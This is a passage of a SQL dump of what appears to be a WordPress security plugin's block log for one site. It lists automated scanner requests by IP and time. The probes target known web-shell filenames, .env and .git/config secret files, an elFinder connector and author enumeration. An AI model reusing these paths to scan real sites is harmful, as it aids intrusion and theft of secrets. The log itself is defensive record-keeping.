06:24:01'),(3792,'https://amb18b.com/wp-includes/js/dist/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:09','2025-11-04 06:24:09'),(3793,'https://amb18b.com/wp-includes/js/dist/vendor/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:13','2025-11-04 06:24:13'),(3794,'https://amb18b.com/wp-includes/js/imgareaselect/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:18','2025-11-04 06:24:18'),(3795,'https://amb18b.com/wp-includes/js/jcrop/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:23','2025-11-04 06:24:23'),(3796,'https://amb18b.com/wp-includes/js/jquery/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:26','2025-11-04 06:24:26'),(3797,'https://amb18b.com/wp-includes/js/jquery/ui/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:31','2025-11-04 06:24:31'),(3798,'https://amb18b.com/wp-includes/js/mediaelement/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:35','2025-11-04 06:24:35'),(3799,'https://amb18b.com/wp-includes/js/mediaelement/renderers/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:39','2025-11-04 06:24:39'),(3800,'https://amb18b.com/wp-includes/js/plupload/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:44','2025-11-04 06:24:44'),(3801,'https://amb18b.com/wp-includes/interactivity-api/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:47','2025-11-04 06:24:47'),(3802,'https://amb18b.com/wp-includes/js/swfupload/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:52','2025-11-04 06:24:52'),(3803,'https://amb18b.com/wp-includes/js/thickbox/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:24:57','2025-11-04 06:24:57'),(3804,'https://amb18b.com/wp-includes/js/tinymce/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:05','2025-11-04 06:25:05'),(3805,'https://amb18b.com/wp-includes/js/tinymce/langs/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:08','2025-11-04 06:25:08'),(3806,'https://amb18b.com/wp-includes/sodium_compat/src/Core32/SecretStream/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:12','2025-11-04 06:25:12'),(3807,'https://amb18b.com/wp-includes/js/tinymce/plugins/charmap/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:17','2025-11-04 06:25:17'),(3808,'https://amb18b.com/wp-includes/css/dist/patterns/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:20','2025-11-04 06:25:20'),(3809,'https://amb18b.com/wp-includes/rest-api/search/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:25','2025-11-04 06:25:25'),(3810,'https://amb18b.com/wp-includes/js/tinymce/plugins/image/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:32','2025-11-04 06:25:32'),(3811,'https://amb18b.com/wp-includes/js/tinymce/plugins/hr/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:35','2025-11-04 06:25:35'),(3812,'https://amb18b.com/wp-includes/js/tinymce/plugins/fullscreen/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:39','2025-11-04 06:25:39'),(3813,'https://amb18b.com/wp-includes/widgets/dir/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:47','2025-11-04 06:25:47'),(3814,'https://amb18b.com/wp-includes/Requests/src/Exception/Http/index.php','196.251.66.105','Direct Access',1,'2025-11-04 06:25:50','2025-11-04 06:25:50'),(3815,'https://amb18b.com/wordpress/','34.23.120.214','Direct Access',1,'2025-11-04 18:35:51','2025-11-04 18:35:51'),(3816,'https://amb18b.com/old/','34.23.120.214','Direct Access',1,'2025-11-04 18:35:54','2025-11-04 18:35:54'),(3817,'https://amb18b.com/blog/','34.23.120.214','Direct Access',1,'2025-11-04 18:35:56','2025-11-04 18:35:56'),(3818,'https://amb18b.com/wp/','34.23.120.214','Direct Access',1,'2025-11-04 18:35:57','2025-11-04 18:35:57'),(3819,'https://amb18b.com/backup/','34.23.120.214','Direct Access',1,'2025-11-04 18:35:58','2025-11-04 18:35:58'),(3820,'https://amb18b.com/new/','34.23.120.214','Direct Access',1,'2025-11-04 18:36:00','2025-11-04 18:36:00'),(3821,'https://amb18b.com/031.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:42','2025-11-04 21:40:42'),(3822,'https://amb18b.com/ilex.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:43','2025-11-04 21:40:43'),(3823,'https://amb18b.com/flex.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:44','2025-11-04 21:40:44'),(3824,'https://amb18b.com/222.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:45','2025-11-04 21:40:45'),(3825,'https://amb18b.com/444.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:46','2025-11-04 21:40:46'),(3826,'https://amb18b.com/file9.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:47','2025-11-04 21:40:47'),(3827,'https://amb18b.com/filesss.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:48','2025-11-04 21:40:48'),(3828,'https://amb18b.com/file88.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:49','2025-11-04 21:40:49'),(3829,'https://amb18b.com/gifclass4.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:50','2025-11-04 21:40:50'),(3830,'https://amb18b.com/555.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:51','2025-11-04 21:40:51'),(3831,'https://amb18b.com/333.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:53','2025-11-04 21:40:53'),(3832,'https://amb18b.com/hly.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:54','2025-11-04 21:40:54'),(3833,'https://amb18b.com/d12.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:55','2025-11-04 21:40:55'),(3834,'https://amb18b.com/2clas.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:56','2025-11-04 21:40:56'),(3835,'https://amb18b.com/bless5.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:57','2025-11-04 21:40:57'),(3836,'https://amb18b.com/file15.php','4.241.111.42','Direct Access',1,'2025-11-04 21:40:59','2025-11-04 21:40:59'),(3837,'https://amb18b.com/hk.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:00','2025-11-04 21:41:00'),(3838,'https://amb18b.com/alpa.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:01','2025-11-04 21:41:01'),(3839,'https://amb18b.com/file21.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:02','2025-11-04 21:41:02'),(3840,'https://amb18b.com/ssss.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:03','2025-11-04 21:41:03'),(3841,'https://amb18b.com/ut.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:04','2025-11-04 21:41:04'),(3842,'https://amb18b.com/inde.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:05','2025-11-04 21:41:05'),(3843,'https://amb18b.com/classgoto24.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:07','2025-11-04 21:41:07'),(3844,'https://amb18b.com/030.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:08','2025-11-04 21:41:08'),(3845,'https://amb18b.com/thh.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:09','2025-11-04 21:41:09'),(3846,'https://amb18b.com/indo.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:10','2025-11-04 21:41:10'),(3847,'https://amb18b.com/fileas.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:11','2025-11-04 21:41:11'),(3848,'https://amb18b.com/yellow.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:12','2025-11-04 21:41:12'),(3849,'https://amb18b.com/33.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:13','2025-11-04 21:41:13'),(3850,'https://amb18b.com/plss3.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:14','2025-11-04 21:41:14'),(3851,'https://amb18b.com/he.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:15','2025-11-04 21:41:15'),(3852,'https://amb18b.com/thxt.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:16','2025-11-04 21:41:16'),(3853,'https://amb18b.com/wfile.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:17','2025-11-04 21:41:17'),(3854,'https://amb18b.com/class20.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:19','2025-11-04 21:41:19'),(3855,'https://amb18b.com/1.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:20','2025-11-04 21:41:20'),(3856,'https://amb18b.com/usep.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:21','2025-11-04 21:41:21'),(3857,'https://amb18b.com/wa.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:22','2025-11-04 21:41:22'),(3858,'https://amb18b.com/wb.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:23','2025-11-04 21:41:23'),(3859,'https://amb18b.com/file1.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:24','2025-11-04 21:41:24'),(3860,'https://amb18b.com/2.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:26','2025-11-04 21:41:26'),(3861,'https://amb18b.com/a2.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:27','2025-11-04 21:41:27'),(3862,'https://amb18b.com/a.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:28','2025-11-04 21:41:28'),(3863,'https://amb18b.com/gmo.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:29','2025-11-04 21:41:29'),(3864,'https://amb18b.com/info.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:30','2025-11-04 21:41:30'),(3865,'https://amb18b.com/file2.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:31','2025-11-04 21:41:31'),(3866,'https://amb18b.com/lv.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:32','2025-11-04 21:41:32'),(3867,'https://amb18b.com/about.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:33','2025-11-04 21:41:33'),(3868,'https://amb18b.com/abcd.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:34','2025-11-04 21:41:34'),(3869,'https://amb18b.com/lock360.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:35','2025-11-04 21:41:35'),(3870,'https://amb18b.com/alfa.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:36','2025-11-04 21:41:36'),(3871,'https://amb18b.com/NewFile.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:37','2025-11-04 21:41:37'),(3872,'https://amb18b.com/atomlib.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:38','2025-11-04 21:41:38'),(3873,'https://amb18b.com/--.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:40','2025-11-04 21:41:40'),(3874,'https://amb18b.com/system_log.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:41','2025-11-04 21:41:41'),(3875,'https://amb18b.com/pp.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:42','2025-11-04 21:41:42'),(3876,'https://amb18b.com/geck.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:43','2025-11-04 21:41:43'),(3877,'https://amb18b.com/gm.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:44','2025-11-04 21:41:44'),(3878,'https://amb18b.com/makeasmtp.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:45','2025-11-04 21:41:45'),(3879,'https://amb18b.com/file4.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:46','2025-11-04 21:41:46'),(3880,'https://amb18b.com/lala.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:47','2025-11-04 21:41:47'),(3881,'https://amb18b.com/admin.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:48','2025-11-04 21:41:48'),(3882,'https://amb18b.com/7.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:49','2025-11-04 21:41:49'),(3883,'https://amb18b.com/file18.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:51','2025-11-04 21:41:51'),(3884,'https://amb18b.com/ffile.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:52','2025-11-04 21:41:52'),(3885,'https://amb18b.com/file7.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:53','2025-11-04 21:41:53'),(3886,'https://amb18b.com/we.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:54','2025-11-04 21:41:54'),(3887,'https://amb18b.com/gfile.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:55','2025-11-04 21:41:55'),(3888,'https://amb18b.com/jlex3.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:56','2025-11-04 21:41:56'),(3889,'https://amb18b.com/des.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:57','2025-11-04 21:41:57'),(3890,'https://amb18b.com/aaa.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:58','2025-11-04 21:41:58'),(3891,'https://amb18b.com/gifclass.php','4.241.111.42','Direct Access',1,'2025-11-04 21:41:59','2025-11-04 21:41:59'),(3892,'https://amb18b.com/vee.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:00','2025-11-04 21:42:00'),(3893,'https://amb18b.com/efile.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:01','2025-11-04 21:42:01'),(3894,'https://amb18b.com/afile.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:03','2025-11-04 21:42:03'),(3895,'https://amb18b.com/errorfile.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:04','2025-11-04 21:42:04'),(3896,'https://amb18b.com/f35.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:05','2025-11-04 21:42:05'),(3897,'https://amb18b.com/gool.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:06','2025-11-04 21:42:06'),(3898,'https://amb18b.com/haikh.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:07','2025-11-04 21:42:07'),(3899,'https://amb18b.com/135.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:08','2025-11-04 21:42:08'),(3900,'https://amb18b.com/enclas.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:09','2025-11-04 21:42:09'),(3901,'https://amb18b.com/ioxi-o.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:10','2025-11-04 21:42:10'),(3902,'https://amb18b.com/wp-admin/js/wp-conflg.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:11','2025-11-04 21:42:11'),(3903,'https://amb18b.com/classwithtostring.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:12','2025-11-04 21:42:12'),(3904,'https://amb18b.com/image.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:13','2025-11-04 21:42:13'),(3905,'https://amb18b.com/wp-admin/wp-conflg.php?p=','4.241.111.42','Direct Access',1,'2025-11-04 21:42:14','2025-11-04 21:42:14'),(3906,'https://amb18b.com/mail.php?','4.241.111.42','Direct Access',1,'2025-11-04 21:42:15','2025-11-04 21:42:15'),(3907,'https://amb18b.com/sx.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:16','2025-11-04 21:42:16'),(3908,'https://amb18b.com/max.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:17','2025-11-04 21:42:17'),(3909,'https://amb18b.com/size.php?p=','4.241.111.42','Direct Access',1,'2025-11-04 21:42:19','2025-11-04 21:42:19'),(3910,'https://amb18b.com/mpxct.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:20','2025-11-04 21:42:20'),(3911,'https://amb18b.com/0xx.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:21','2025-11-04 21:42:21'),(3912,'https://amb18b.com/s.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:22','2025-11-04 21:42:22'),(3913,'https://amb18b.com/hq.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:23','2025-11-04 21:42:23'),(3914,'https://amb18b.com/blox.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:24','2025-11-04 21:42:24'),(3915,'https://amb18b.com/ant.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:25','2025-11-04 21:42:25'),(3916,'https://amb18b.com/fso.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:26','2025-11-04 21:42:26'),(3917,'https://amb18b.com/htaccess.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:27','2025-11-04 21:42:27'),(3918,'https://amb18b.com/wp-trackback.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:28','2025-11-04 21:42:28'),(3919,'https://amb18b.com/readme.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:31','2025-11-04 21:42:31'),(3920,'https://amb18b.com/v.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:32','2025-11-04 21:42:32'),(3921,'https://amb18b.com/sck.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:33','2025-11-04 21:42:33'),(3922,'https://amb18b.com/X7x.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:34','2025-11-04 21:42:34'),(3923,'https://amb18b.com/xpass.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:35','2025-11-04 21:42:35'),(3924,'https://amb18b.com/bless.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:37','2025-11-04 21:42:37'),(3925,'https://amb18b.com/bless2.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:38','2025-11-04 21:42:38'),(3926,'https://amb18b.com/bless6.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:39','2025-11-04 21:42:39'),(3927,'https://amb18b.com/bless10.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:40','2025-11-04 21:42:40'),(3928,'https://amb18b.com/bless11.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:41','2025-11-04 21:42:41'),(3929,'https://amb18b.com/wp-admin/js/index.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:42','2025-11-04 21:42:42'),(3930,'https://amb18b.com/thoms.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:43','2025-11-04 21:42:43'),(3931,'https://amb18b.com/xsas.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:44','2025-11-04 21:42:44'),(3932,'https://amb18b.com/xrp.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:45','2025-11-04 21:42:45'),(3933,'https://amb18b.com/wp-freya.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:46','2025-11-04 21:42:46'),(3934,'https://amb18b.com/css/index.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:47','2025-11-04 21:42:47'),(3935,'https://amb18b.com/file30.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:48','2025-11-04 21:42:48'),(3936,'https://amb18b.com/fesa.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:49','2025-11-04 21:42:49'),(3937,'https://amb18b.com/class-.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:50','2025-11-04 21:42:50'),(3938,'https://amb18b.com/.well-known/gecko-litespeed.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:51','2025-11-04 21:42:51'),(3939,'https://amb18b.com/up.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:52','2025-11-04 21:42:52'),(3940,'https://amb18b.com/403.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:53','2025-11-04 21:42:53'),(3941,'https://amb18b.com/9v6.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:54','2025-11-04 21:42:54'),(3942,'https://amb18b.com/lte7.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:56','2025-11-04 21:42:56'),(3943,'https://amb18b.com/1vbqo.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:57','2025-11-04 21:42:57'),(3944,'https://amb18b.com/l10n.php','4.241.111.42','Direct Access',1,'2025-11-04 21:42:59','2025-11-04 21:42:59'),(3945,'https://amb18b.com/tajj.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:00','2025-11-04 21:43:00'),(3946,'https://amb18b.com/fdd2.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:01','2025-11-04 21:43:01'),(3947,'https://amb18b.com/class9.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:03','2025-11-04 21:43:03'),(3948,'https://amb18b.com/sto.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:04','2025-11-04 21:43:04'),(3949,'https://amb18b.com/7h.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:05','2025-11-04 21:43:05'),(3950,'https://amb18b.com/fh26.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:06','2025-11-04 21:43:06'),(3951,'https://amb18b.com/ixj.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:07','2025-11-04 21:43:07'),(3952,'https://amb18b.com/x23.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:09','2025-11-04 21:43:09'),(3953,'https://amb18b.com/zeu.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:10','2025-11-04 21:43:10'),(3954,'https://amb18b.com/f2r4.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:11','2025-11-04 21:43:11'),(3955,'https://amb18b.com/lopst.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:12','2025-11-04 21:43:12'),(3956,'https://amb18b.com/gecko.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:13','2025-11-04 21:43:13'),(3957,'https://amb18b.com/0xs.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:14','2025-11-04 21:43:14'),(3958,'https://amb18b.com/Zeiss.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:15','2025-11-04 21:43:15'),(3959,'https://amb18b.com/x0x.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:16','2025-11-04 21:43:16'),(3960,'https://amb18b.com/adin.php','4.241.111.42','Direct Access',1,'2025-11-04 21:43:18','2025-11-04 21:43:18'),(3961,'https://amb18b.com/sites/all/libraries/elfinder/src/connectors/php/connector.php','94.74.182.45','Direct Access',1,'2025-11-04 22:36:04','2025-11-04 22:36:04'),(3962,'https://amb18b.com//wp-includes/wlwmanifest.xml','157.66.55.50','Direct Access',1,'2025-11-04 22:52:56','2025-11-04 22:52:56'),(3963,'https://amb18b.com//?author=2','157.66.55.50','Direct Access',1,'2025-11-04 22:52:57','2025-11-04 22:52:57'),(3964,'https://amb18b.com/.env','176.65.148.212','Direct Access',1,'2025-11-04 23:02:31','2025-11-04 23:02:31'),(3965,'https://amb18b.com/.git/config','45.148.10.152','Direct Access',1,'2025-11-04 23:06:09','2025-11-04 23:06:09'),(3966,'https://amb18b.com/qcUvIXRVYEiL','95.154.200.51','Direct Access',1,'2025-11-05 00:25:35','2025-11-05 00:25:35'),(3967,'https://amb18b.com/?author=2','178.128.95.221','Direct Access',1,'2025-11-05 02:33:14','2025-11-05 02:33:14'),(3968,'https://amb18b.com/wp-plain.php','74.176.49.2','Invalid Referrer',1,'2025-11-05 05:56:00','2025-11-05 05:56:00'),(3969,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','74.176.49.2','Invalid Referrer',1,'2025-11-05 05:56:00','2025-11-05 05:56:00'),(3970,'https://amb18b.com/','74.176.49.2','Invalid Referrer',2,'2025-11-05 05:56:02','2025-11-05 05:56:02'),(3971,'https://amb18b.com/alfacgiapi/perl.alfa','74.176.49.2','Invalid Referrer',1,'2025-11-05 05:56:03','2025-11-05 05:56:03'),(3972,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','74.176.49.2','Direct Access',1,'2025-11-05 05:56:04','2025-11-05 05:56:04'),(3973,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','74.176.49.2','Direct Access',1,'2025-11-05 05:56:06','2025-11-05 05:56:06'),(3974,'https://amb18b.com/wp-blog.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:25','2025-11-05 07:50:25'),(3975,'https://amb18b.com/webdb.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:26','2025-11-05 07:50:26'),(3976,'https://amb18b.com/witmmm.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:27','2025-11-05 07:50:27'),(3977,'https://amb18b.com/18299.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:29','2025-11-05 07:50:29'),(3978,'https://amb18b.com/zxasd.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:30','2025-11-05 07:50:30'),(3979,'https://amb18b.com/nxx.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:31','2025-11-05 07:50:31'),(3980,'https://amb18b.com/shlo.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:32','2025-11-05 07:50:32'),(3981,'https://amb18b.com/sql.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:34','2025-11-05 07:50:34'),(3982,'https://amb18b.com/Marvins.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:35','2025-11-05 07:50:35'),(3983,'https://amb18b.com/wpfile.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:37','2025-11-05 07:50:37'),(3984,'https://amb18b.com/foyhd.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:38','2025-11-05 07:50:38'),(3985,'https://amb18b.com/f350.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:39','2025-11-05 07:50:39'),(3986,'https://amb18b.com/moon.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:40','2025-11-05 07:50:40'),(3987,'https://amb18b.com/bless3.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:41','2025-11-05 07:50:41'),(3988,'https://amb18b.com/link.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:42','2025-11-05 07:50:42'),(3989,'https://amb18b.com/CmKHK.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:43','2025-11-05 07:50:43'),(3990,'https://amb18b.com/rtg.php','48.210.15.48','Direct Access',2,'2025-11-05 07:51:52','2025-11-05 07:50:45'),(3991,'https://amb18b.com/tools.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:46','2025-11-05 07:50:46'),(3992,'https://amb18b.com/term.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:47','2025-11-05 07:50:47'),(3993,'https://amb18b.com/fluentform.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:49','2025-11-05 07:50:49'),(3994,'https://amb18b.com/agqpec.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:51','2025-11-05 07:50:51'),(3995,'https://amb18b.com/byuri.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:52','2025-11-05 07:50:52'),(3996,'https://amb18b.com/axx.php','48.210.15.48','Direct Access',2,'2025-11-05 07:51:51','2025-11-05 07:50:53'),(3997,'https://amb18b.com/oiko6u.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:54','2025-11-05 07:50:54'),(3998,'https://amb18b.com/wp-admin/oiko6u.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:55','2025-11-05 07:50:55'),(3999,'https://amb18b.com/11.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:56','2025-11-05 07:50:56'),(4000,'https://amb18b.com/9WOLF.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:57','2025-11-05 07:50:57'),(4001,'https://amb18b.com/a.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:58','2025-11-05 07:50:58'),(4002,'https://amb18b.com/f35.php','48.210.15.48','Direct Access',1,'2025-11-05 07:50:59','2025-11-05 07:50:59'),(4003,'https://amb18b.com/crew.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:01','2025-11-05 07:51:01'),(4004,'https://amb18b.com/gm.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:02','2025-11-05 07:51:02'),(4005,'https://amb18b.com/pass.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:04','2025-11-05 07:51:04'),(4006,'https://amb18b.com/sx_pms.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:05','2025-11-05 07:51:05'),(4007,'https://amb18b.com/btex.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:06','2025-11-05 07:51:06'),(4008,'https://amb18b.com/ms.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:08','2025-11-05 07:51:08'),(4009,'https://amb18b.com/lptlo.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:09','2025-11-05 07:51:09'),(4010,'https://amb18b.com/misc.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:10','2025-11-05 07:51:10'),(4011,'https://amb18b.com/xlluw.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:11','2025-11-05 07:51:11'),(4012,'https://amb18b.com/ll.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:12','2025-11-05 07:51:12'),(4013,'https://amb18b.com/qa.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:13','2025-11-05 07:51:13'),(4014,'https://amb18b.com/auot.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:14','2025-11-05 07:51:14'),(4015,'https://amb18b.com/g.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:15','2025-11-05 07:51:15'),(4016,'https://amb18b.com/codex.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:17','2025-11-05 07:51:17'),(4017,'https://amb18b.com/ymq4nt.php','48.210.15.48','Direct Access',1,'2025-11-05 07:51:19','2025-11-05 07:51:19'),(4018,'https://amb18b.com/inzrw.php','48.210.15.48','Direct Access',2,'2025-11-05 07:51:43','2025-11-05 07:51:21'),(4019,'https://amb18b.com/ca.php','48.210.15.48','Direct Access',2,'2025-11-05 07:51:42','2025-11-05 